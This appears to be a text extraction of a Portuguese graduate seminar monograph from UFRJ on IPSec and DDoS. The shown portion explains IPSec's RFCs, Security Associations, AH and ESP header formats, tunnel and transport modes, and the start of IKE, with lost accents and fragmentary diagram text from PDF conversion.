Beruflich Dokumente
Kultur Dokumente
NDICE
1 2 3 4 PREFCIO........................................................................................................................................... 2 INTRODUO..................................................................................................................................... 3 MOTIVAO PARA A PESQUISA DE SEGURANA EM REDES TCP/IP ........................................... 4 0 IPSec ................................................................................................................................................. 8 4.1 APRESENTAO E PROPSITOS GERAIS................................................................................. 9 4.2 COMPONENTES........................................................................................................................ 13 4.3 AS SECURITY ASSOCIATION .................................................................................................... 14 4.4 O AUTHENTICATION HEADER ( AH )...................................................................................... 19 4.5 0 ENCAPSULATION SECURITY PAYLOAD ( ESP )................................................................... 24 4.6 O INTERNET KEY EXCHANGE ( IKE )...................................................................................... 30 4.7 APLICAES............................................................................................................................. 40 4.8 IMPLEMENTAES .................................................................................................................. 43 4.9 CONSIDERAES DE PERFORMANCE................................................................................... 46 4.10 A INTEROPERABILIDADE ........................................................................................................ 49 4.11 ESTUDOS DE CASOS ................................................................................................................ 51 5 O DDoS.............................................................................................................................................. 55 5.1 DEFINIES E HISTRICO ..................................................................................................... 56 5.2 IMPLEMENTAES DO DDoS ................................................................................................. 58 5.3 A ANATOMIA DO DDoS ............................................................................................................ 61 5.4 PROPOSTAS DE SOLUES..................................................................................................... 64 6 CONSIDERAES FINAIS ................................................................................................................ 65 7 GLOSSRIO....................................................................................................................................... 66 8 ANEXOS............................................................................................................................................. 68 9 REFERNCIAS .................................................................................................................................. 73 10 TRABALHO PRTICO ....................................................................................................................... 76 11 O AUTOR........................................................................................................................................... 77
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
1 PREFCIO
Esta monografia resultado do seminrio IPSec e DDos, ASPECTOS DE SEGURANA EM REDES TCP/IP, ocorrido no perodo de setembro a dezembro de 2000 como parte dos trabalhos da cadeira COS871 ( Tpicos Especiais em Redes Integradas de Faixa Larga ) , integrante do curso de mestrado em engenharia de sistemas da COPPE-UFRJ. O seminrio foi realizado sob a coordenao do professor Lus Felipe M. de Moraes. Este trabalho tem como principal objetivo iniciar os estudos para uma possvel tese de mestrado na rea de segurana em redes de computadores, assumindo como objetivo principal novas solues na rea de IPSec e DDoS. Qualquer comentrio ou sugestes a este trabalho podem ser enviadas ao autor via e-mail , ismael@ravel.ufrj.br. O autor assume total responsabilidade por qualquer erro ocorrido neste trabalho.
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
INTRODUO
Este trabalho indicado para estudantes e profissionais da rea de redes de computadores que procuram aprofundar seus conhecimentos na rea de segurana, com enfoque em IPSec e DDoS . O captulo 3 apresenta os conceitos bsicos utilizados na rea de segurana em redes de computadores, tentando mostrar ao leitor a grande importncia do estudo de segurana de redes de computadores nos dias atuais. Assuntos como as fagilidades do TCP/IP, formas de ataques e algumas tcnicas de defesa sero abordados de forma suscinta. O captulo 4 trata inteiramente do IPSec. A arquitetura de segurana ser detalhada, seus protocolos sero discutidos e analisados e suas aplicaes sero apresentadas. Ser dedicada uma especial ateno as aplicaes de VPN devido ao grande uso que se vislumbra na INTERNET para este tipo de aplicao. Aspectos de performance e interoperabilidade sero discutidos juntamente com as implementaes existentes no mercado. O captulo 5 trata inteiramente do DDoS. Este tipo de ataque tornou-se o grande vilo da INTERNET moderna, existindo atualmente uma grande necessidade para novas solues que acabem de vez com o problema. No trabalho, apresento as implementaes e solues existentes , analisando-as e propondo novas medidas de proteo. No captulo 6 apresento as concluses que chegamos durante o seminrio. Os captulos finais compem-se de um glossrio dos termos utilizados, documentos de anexo, um relatrio do trabalho prtico e uma apresentao do autor. Boa leitura, espero que este material seja til. O autor
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
TIPOS DE ATAQUES
Diversos ataques disseminaram-se na REDE , entre os quais destaco: SPOOFING DOS e DDoS TROJAN HORSES TCP HIJACKING SNIFFING FLOODING O link http://www.fact.cl/consultoria/security/docs/vul/index.html possui 7 pginas que descrevem ataques e vulnerabilidades de redes, vale a pena conferir. OS SERVIOS No TCP/IP os usurios finais realizam seu trabalho na rede atravs dos servios oferecidos por um servidor. Atualmente, com o grande desenvolvimento tecnolgico que atingimos existe uma gama enorme de servios que podem ser usados. Estes servios so os verdadeiros alvos dos ataques da rede. Entre os principais servios podemos citar: Transferncia de arquivos Correio eletrnico EDI Multimdia Teleconferncia Videoconferncia WWW VPN
5
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Estes servios precisam disponibilizar aos seus usurios uma aplicao confivel e de performance aceitvel. imperativo proteg-los contra as vulnerabilidades do TCP/IP. Este trabalho apresenta alternativas para proporcionar uma ambiente de rede mais seguro para as aplicaes. COMO PROVER SEGURANA? Uma arquitetura de rede eficaz deve especificar os seguintes servios para seus usurios: 1) Autenticao : a capacidade de identificar quem est usando os servios da rede. 2) Autorizao : Permitir a atribuio de privilgios aos servios. 3) Controle de Acesso : Permitir a atribuio de quem pode usar os servios e com qual privilgio ( restringir acesso ). 4) Confidencialidade : Garantir que os dados sejam compreensveis apenas para as partes finais da comunicao . 5) No-Repdio : confirmar a autoria do uso dos servios. 6) Auditoria: Permitir a Gerao de logs para verificao dos eventos. Estes servios de segurana podem ser implantados atravs das seguintes tecnologias: 1) Criptografia: Tcnica de codificao dos dados. Utiliza-se de chaves ( pblica ou privada ), tornando os dados incompreensveis. Como exemplo de algortimos de criptografia pode-se citar o DES, o RSA e o BLOWFISH, entre outros. 2) Firewall: Dispositivo que consegue controlar que pacotes podem entrar e/ou sair de uma rede. 3) IDS : Dispositivos que monitoram constantemente a rede. Podem tomar aes na medida que determinados eventos ocorram na rede monitorada.
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
4) Integridade: Tcnicas que garantem que os dados no foram alterados. Utilizam-se de criptografia para este objetivo. Como exemplo temos o SHA e o MD5. 5) Assinatura Digital: Tcnicas que garantem a autoria dos dados. Utiliza-se de criptografia para este objetivo. Uma melhor soluo ir agregar um conjunto destas tcnicas a fim de satisfazer os servios de segurana desejados. A partir do prximo tem iremos estudar com detalhes algumas destas solues.
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
4 0 IPSec
Algumas aplicaes adotam solues particulares ao problema de segurana ( Como exemplo podemos citar o SMTP com o PGP e o WWW com o SSL ) , porm existe a necessidade de solues mais robustas e abrangentes que atendam a toda a comunidade INTERNET. Neste contexto surge o IPSec.
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
O IPSec define uma arquitetura para implementao de servios de segurana na camada de rede do TCP/IP. Sendo assim, ele especifica os protocolos, interfaces e servios necessrios para obtermos uma rede segura. O rgo responsvel pelo desenvolvimento do IPSec o IETF no seu grupo de segurana. O IPSec est especificado em 18 RFCs descritas abaixo: 1) RFC2411 IP Security Document Roadmap 2) RFC2401 Security Architecture for the Internet Protocol 3) RFC2402 IP Authentication Header (AH) 4) RFC2406 IP Encapsulating security Payload (ESP) 5) RFC2409 The Internet Key Exchange (IKE) 6) RFC2408 Internet Security Association and Key Management Protocol ( ISAKMP) 7) RFC2407 The Internet IP Security Domain of Interpretation for ISAKMP 8) RFC2412 The OAKLEY Key Determination Protocol 9) RFC1828 IP Authentication using Keyed MD5 10) RFC2104 HMAC: Keyed-Hashing for Message Authentication 11) RFC2085 HMAC-MD5 IP Authentication with Replay Prevention 12) RFC1829 The ESP DES-CBC Transform 13) RFC2451 The ESP CBC-Mode Cipher Algorithms 14) RFC2405 The ESP DES-CBC Cipher Algorithm With Explicit IV 15) RFC2403 The Use of HMAC-MD5-96 within ESP and AH 16) RFC2404 The Use of HMAC-SHA-1-96 within ESP and AH 17) RFC2857 The Use of HMAC-RIPEMD-160-96 within ESP and AH 18) RFC2410 The NULL Encryption Algorithm and Its Use With IPSec
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
As RFC's formam a documentao mais completa do IPSec, porm devido ao seu grande nmero a sua leitura pode se tornar confusa. A seguir apresento minha sugesto para leitura das RFC's. A prpria especificao do IPSec na RFC2411 j nos d uma orientao de como as normas do IPSec esto estruturadas. A RFC2411 especifica a diviso das RFC's em grupos funcionais e define valores padres para o inter-relacionamento entre os documentos. A estruturao destes grupos est definida no grfico abaixo:
ARQUITETURA
PROTOCOLO ESP
PROTOCOLO AH
ALGORTIMOS DE AUTENTICAO
GERNCIA DE CHAVES
10
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
ARQUITETURA : Abrange os conceitos gerais, requisitos de segurana, definies e mecanismos definidos pelo IPSec PROTOCOLO ESP : O Encapsulating Security Payload abrange o formato dos pacotes e aspectos gerais sobre o seu uso para criptografar e autenticar pacotes PROTOCOLO AH : O Authentication Header abrange o formato dos pacotes s os aspectos gerais relacionados com a autenticao dos pacotes ALGORTIMOS DE CRIPTOGRAFIA : Descrio dos algortimos de criptografia utilizados no IPSec
ALGORTIMOS DE AUTENTICAO : Descrio dos algortimos de autenticao utilizados no IPSec GERNCIA DE CHAVES : Descrio dos mecanismos de gerncia de chaves utilizados pelo IPSec DOI : O domain of Interpretation contm valores pelos quais os docunentos comunicam-se entre si. As setas do grfico indicam uma boa sequncia para o estudo. O DOI, RFC2411 deve iniciar os estudos , pois fornece uma descrio dos tipos de documentos que encontraremos na especificao dos protocolos e algortimos. Em seguida, devemos obter os conhecimentos gerais do IPSec atravs do grupo ARQUITETURA, composto pela RFC2401. Aps obtermos os conhecimentos bsicos podemos nos aperfeioar no IPSec, escolhendo um dos seus protocolos para estudo adotarei a seguinte sequncia : PROTOCOLO ESP, PROTOCOLO AH e GERNCIA DE CHAVES. O grupo PROTOCOLO ESP composto pela RFC2406 e o grupo PROTOCOLO AH pela RFC2402. O grupo GERNCIA DE CHAVES o mais complexo e compe-se pelas RFCs 2408, 2409 e 2407. Os grupos ALGARTIMOS DE CRIPTOGRAFIA ( RFCs 1829, 2410, 2451, 2403, 2404, 2405 e 2857 ) e ALGARTIMOS DE AUTENTICAO ( RFCs 1828, 2104, 2085, 2403, 2404 e 2857) devem ser estudados de acordo com a necessidade do leitor em conhecer um determinado algortimo. Note que alguns algortimos pertencem aos dois grupos. O IPSec pretende suprir as vulnerabilidades do TCP/IP atravs especificao dos seguintes servios de segurana: da
11
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
1) Controle de acesso 2) Integridade de pacotes 3) Autenticao da origem 4) Privacidade dos pacotes 5) Privacidade em fluxo de pacotes 6) Proteo contra replays O IPSec oferece estes servios de segurana na camada de rede, logo as camadas superiores ( transporte e aplicao ) podem utilizar-se do servio. No IPV6 o IPSec mandatrio, enquanto no IPV4 no o . Sua implementao projetada atravs de headers especiais, header extensions no IPV6 e um header de protocolo a mais no IPV4, normalmente colocados entre o header original do IP e seu payload ( vide fig.1 e fig.2 ).
ENDEREO IP FONTE
ENDEREO IP DESTINO
PAYLOAD
fig 1
12
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
IP HEADER
IPSEC HEADER
PAYLOAD
fig 2
4.2 COMPONENTES
O IPSec, como uma arquitetura de segurana, composto por protocolos que so executados pelos ns da rede que se utilizam dos seus servios de segurana.O IPSec especifica 3 protocolos a saber: 1) O AH ( Authentication Header ) Prov os servios de autenticao, integridade e anti-replay 2) O ESP ( Encapsulating Security Payload ) Prov os servios de Criptografia dos dados e, opcionalmente autenticao e anti-replay 3) O IKE ( Internet Key Exchange )
13
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Protocolo hbrido, formado pelo ISAKMP ( Internet Key Management Protocol ) e pelo OAKLEY , responsvel por gerar um meio seguro para a troca de informaes na rede A operao de aplicar um determinado algortimo de criptografia num pacote chamada no IPSec de transformao. Durante a configurao de uma conexo que usa o IPSec para comunicar-se podemos definir uma ou mais transformaes. Todo o trfego de uma comunicao via IPSec executado sob o domnio de uma SECURITY ASSOCIATION ( SA ) que uma entidade peer-to-peer e simplex responsvel por todas as informaes de controle da sesso IPSec entre dois ns. Por fim, temos os ns propriamente ditos que so os reais responsveis pela insero e/ou encaminhamento dos pacotes na rede. So eles que executam o software /hardware que implementa o IPSec. Existem dois tipos de ns: os SECURITY GATEWAYS ( SG ) e os End Station IPSec.Os SG disponibilizam os servios de segurana para toda a rede ( roteadores ou firewalls ), enquanto os End Station fazem a segurana fim-a-fim entre os parceiros. Para seu funcionamento o IPSec define vrias estruturas de dados que so armazenadas em cada n da rede que execute o IPSec. Este conjunto de dados formam dois bancos de dados a saber : O SPD ( Security Policy Database ) e o SAD ( Security Association Database ). O SPD composto por um conjunto de regras que determinam como processar os pacotes que chegam numa interface. O SAD composto por uma ou mais SA e armazena os parmetros de cada uma delas. Ele um banco de dados dinmico, ou seja, suas entradas so excludas aps o termino da SA correspondente. Nas prximas sees falarei com detalhes sobre cada componente do IPSec.
14
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
SECURITY ASSOCIATION
INTERNET
SG
15
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
SA1
( AH XOR ESP )
REDE
IPSec Host ou SG
SA2
( AH XOR ESP )
O IKE o protocolo responsvel pelo estabelecimento e manuteno das SA. Uma SA define uma nica transformao aplicada nos pacotes que trafegam naquela conexo. Num mesmo instante podemos estabelecer diversas SA entre dois ns, cada uma realizando uma transformao diferente nos pacotes. A SA uma estrutura dinmica que somente existe enquanto houver necessidade da existncia da conexo entre as mquinas que a estabeleceram. Univocamente uma SA identificada no SAD atravs de 3 parmetros: SPI ( Security Parameters Index ); Endereo IP do parceiro e protocolo de segurana utilizado ( AH ou ESP ). A SPI uma string de 32 bits associada com uma e somente uma SA e com significncia apenas local ( n onde a SA foi criada ). Durante a comunicao os headers do AH e ESP identificam a SA de destino atravs do campo SPI do header. O SAD armazena as outras informaes das SA e formado pelos seguintes parmetros: Contador do nmero de sequncia dos datagramas (32 bits ) Flag que sinaliza o estouro ( overflow ) do nmero de sequncia Janela de anti-replay Informaes do AH Informaes do ESP Tempo de vida da SA Modo de funcionamento ( tnel ou transporte ) MTU do caminho
16
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Um pacote, ao chegar numa interface submetido as entradas da SPD a fim de ser feita uma relao entre a entrada e uma das SA do SAD. Se um matching no for encontrado o pacote pode ser descartado ou no ser tratado pelo IPSec. Caso seja encontrado um matching com uma das regras, o pacote sofrer a transformao solicitada pela SA relacionada com a entrada do SPD. Uma entrada do SPD formada por campos chamados de seletores. Os seletores so campos do protocolo IP ou de um dos seus protocolos superiores. Os seguintes campos podem compor uma entrada do SPD: Endereo IP de destino Endereo IP da fonte ID do usurio Marcao de sensibilidade dos dados Protocolo de transporte Protocolo do IPSec Portas origem e destino Classe do IPV6 Marcao de fluxo do IPV6 TOS do IPV4
As SA podem trabalhar em dois modos : Transporte e Tnel. O modo transporte usado para prover segurana para comunicaes fim-afim ( cliente/servidor , duas estaes de trabalho ou console de gerenciamento/dispositivo gerenciado ). Aqui o escopo de proteo do pacote restringe-se ao payload do IP ( segmento TCP ou UDP e pacote ICMP ). O modo tnel usado para prover segurana para comunicaes entre redes ou entre uma estao e uma rede ( tipicamente aplicaes de VPN ). Aqui o escopo de proteo todo o pacote IP. Um novo cabealho IP gerado e o cabealho original incluso no payload do novo cabealho IP. O modo tnel mandatrio se uma das extremidades da conexo for um SG. A tabela tab1 ilustra a utilizao dos protocolos do IPSec em funo dos modos de operao das SA.
17
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
MODO TRANSPORTE Autentica o payload do IP AH Autentica alguns campos do cabealho IP Autentica alguns campos do cabealho extendido do IPV6 Criptografa o payload do IP ESP Criptografa os cabealhos extendidos do IPV6 que venham aps o cabealho do ESP Criptografa o payload do IP
MODO TNEL Autentica todo o pacote IP original Autentica alguns campos do novo cabealho IP Autentica alguns campos do novo cabealho extendido do IPV6 Criptografa todo o cabealho IP original
Criptografa os cabealhos Autentica todo o extendidos do IPV6 que cabealho IP original venham aps o cabealho do ESP Autentica o payload IP No autentica o cabealho IP tab1 ( extrada da pg 408 livro do Stalings )
Em funo dos tipos de ns do IPSec podemos relacion-los como mostrado na tabela tab2.
18
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
TRANSPORTE
TNEL
IPSec HOST SG
SIM
SIM
NO
SIM
tab2
O AH o protocolo do IPSec que especifica os servios de integridade dos dados, autenticao dos dados e, ainda um servio contra o replay de dados. A ele foi atribudo o nmero 51 de protocolo da pilha TCP/IP. O formato do AH , com seus campos, apresentado a seguir :
19
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Bit 0 Px Cabealho 8 Tam do payload Nmero de Sequncia Dados de Autenticao ( varivel ) 16 Reservado Security Parameters Index (SPI) 31
n Prximo Cabealho : Identifica qual o prximo protocolo da pilha n Tamanho do payload : Tamanho total do AH n SPI : Identifica uma SA n Nmero de sequncia : Um contador utilizado na marcao das mensagens n Dados de Autenticao : Contm o ICV ou MAC do pacote O ICV ( Integrity Check Value ) ou MAC (Message Authentication Code ) um checksum do contedo de alguns campos do cabealho IP e do seu payload. Atualmente utiliza-se como algortimos default o HMAC-MD5 e o HMAC-SHA-1 . No clculo do checksum o algortimo adotado utiliza para o clculo, os campos do cabealho IP que no se modificam entre a origem e o destino, alm de todo o payload. Os campos mutveis recebem valor zero para o clculo do checksum. O SPI ( SA )determina qual mtodo criptogrfico ser utilizado nos dados. Para implementar o servio contra o replay de mensagens o n IPSec deve criar uma janela onde os datagramas so validados de acordo com o valor do campo nmero de sequncia . Nmeros de sequncia a esquerda da janela so descartados , nmeros de sequncia direita da janela fazem -na avanar e nmeros de sequncia dentro da janela sero descartados se j estiverem marcados ou sero marcados neste instante. A fig5 ilustra uma janela contrareplay do IPSec.
20
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Tamanho da Janela
...
N-W
Janela avana
fig5
Para beneficiarem-se dos servios oferecidos pelo AH, os pacotes recebem o seguinte tratamento: 1) Utilizando SA em modo transporte Sem segurana :
IPV4
IP HEADER ORIGINAL
PAYLOAD
21
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Com segurana :
IP HEADER
Sem segurana :
IPV6
IP HEADER ORIGINAL
EXT HEADER
PAYLOAD
Com segurana :
IPV6
IP HEADER ORIGINAL
22
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
IPV4
NOVO HDR IP IP HDR PAYLOAD ORIGINAL
AH
IPV6
NOVO HDR IP
AH
IP HDR ORIGINAL
EXT HEADERS
PAYLOAD
O AH protege os dados contra modificao , porm continua a vulnerabilidade dos dados em relao a confidencialidade, ou seja, os dados no esto criptografados, continuam a trafegar em modo puramente texto na rede. O ESP resolve este problema.
23
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
n SPI : Identifica uma SA n Nmero de sequncia : Um contador utilizado para identificar as mensagens n Payload : Se a SPI identifica uma SA de modo transporte , este campo um segmento do transporte. Caso identifique uma SA de modo tnel ser um pacote IP n Padding : Adio de valores nulos para completar o tamanho do cabealho n Tamanho do Padding : Determina o tamanho necessrio ao padding n Px Cabealho : Identifica qual o prximo protocolo da pilha n Dados de Autenticao : Contm o ICV ou MAC do pacote
24
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
O ESP criptografa os campos Payload, padding, tamanho do padding e prximo cabealho. Se oferecer o servio de autenticao, o ESP criptografa apenas o seu header e o payload do pacote. Para se beneficiar dos servios oferecidos pelo ESP, os pacotes recebem o seguinte tratamento: 1) Utilizando SA em modo transporte Com segurana :
IPV4
IP HDR ESP ORIGINAL HDR ESP TRLR ESP AUTH
PAYLOAD
Campos criptografados :
IPV4
PAYLOAD ESP TRAYLER
Onde o trayler composto pelo padding, tamanho do padding e pelo prximo protocolo.
25
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Campos autenticados:
IPV4
ESP HDR ESP TRLR
PAYLOAD
Onde o cabealho ESP formado pelos campos SPI e nmero de sequncia. Com segurana:
IPV4
IP HDR NOVO ESP HDR IP HDR ORIGINAL ESP TRLR ESP AUTH
PAYLOAD
26
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
27
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Campos autenticados:
IPV4
ESP HDR IP HDR ORIGINAL ESP TRLR
PAYLOAD
Campos criptografados:
IPV4
IP HDR ORIGINAL ESP TRLR
PAYLOAD
28
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Com segurana:
IPV6
IP HDR NOVO EXT ESP HDR HDR NOVO IP HDR ORIGINAL EXT HDR ESP TRLR ESP AUTH
PAYLOAD
Campos autenticados:
IPV6
ESP HDR IP HDR ORIGINAL EXT HDR ESP TRLR
PAYLOAD
Campos criptografados:
IPV6
IP HDR ORIGINAL EXT HDR ESP TRLR
PAYLOAD
29
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
30
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
A fase 1 estabelece a criao de uma SA de controle, chamada de ISAKMP SA ou IKE SA. Toda comunicao entre ns IPSec iniciada com a criao desta SA, pois ela quem estabelece o meio seguro de comunicao. Ela tambm responsvel pela criao das outras SA ( SA que trafegam os dados dos usurios ). O meio seguro obtido atravs de mecanismos de chave pblica, calculo de chaves simtricas e troca de nonce e cookies. O perfect forward secrecy garante que uma chave no obtida a partir de outra, dificultando a ao dos hackers. Estes mecanismos visam a proteo contra ataques de replay, hijacking, flooding e man-in-the-middle. Durante esta fase os parceiros podem solicitar a uma estrutura de PKI para certificar uma assinatura digital. A fase 1 pode funcionar em dois modos: principal e agressivo. No modo principal os parceiros criam uma SA em 3 passos distintos, formando um total de 6 mensagens. No primeiro passo existe uma troca de mensagens com o objetivo de estabelecer os protocolos, algortimos e hashs que sero utilizados durante esta comunicao. Este passo chamado de proposta de comunicao. Ao concordarem com uma proposta, os parceiros iniciam um passo de troca de chaves, aqui o objetivo gerar chaves pblicas Diffie-Hellman e nonces utilizados na proteo dos dados e na preveno de ataques. Aps a troca de chaves as mensagens trocadas so criptografadas e inicia-se o passo final onde os parceiros identificam-se mutuamente ( atravs de assinaturas digitais ou certificados de uma autoridade certificadora. Os diagramas abaixo ilustram estes conceitos: 1) Modo Principal 1.1) Primeiro passo ( fase1 em modo principal ).
n Proposta de comunicao
INICIANTE
PAYLO AD SA HEADE R ISAKMP
RESPONDEDOR
HEADER ISAKMP
D PAYLOA SA
31
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Onde: Header ISAKMP Toda mensagem ISAKMP inicia-se por estes campos de formato fixo. Uma mensagem ISAKMP pode ser formada por um ou mais payloads. O header armazena informaes necessrias ao processamento dos payloads, manuteno dos seus estados e proteo contra DoS e replay. Payload SA - Utilizado para negociar os atributos de segurana e indicar o DOI e a situao da negociao. A seguir apresento o formato dos pacotes.
23|24
31
IDENTIFICAO DA MENSAGEM
O significado dos campos o seguinte: Cookie Um nmero aleatrio associado ao n que o gerou. Utilizado contra ataques de replay e DoS Px payload identifica o tipo do prximo payload do pacote. Pode assumir os seguintes valores:
32
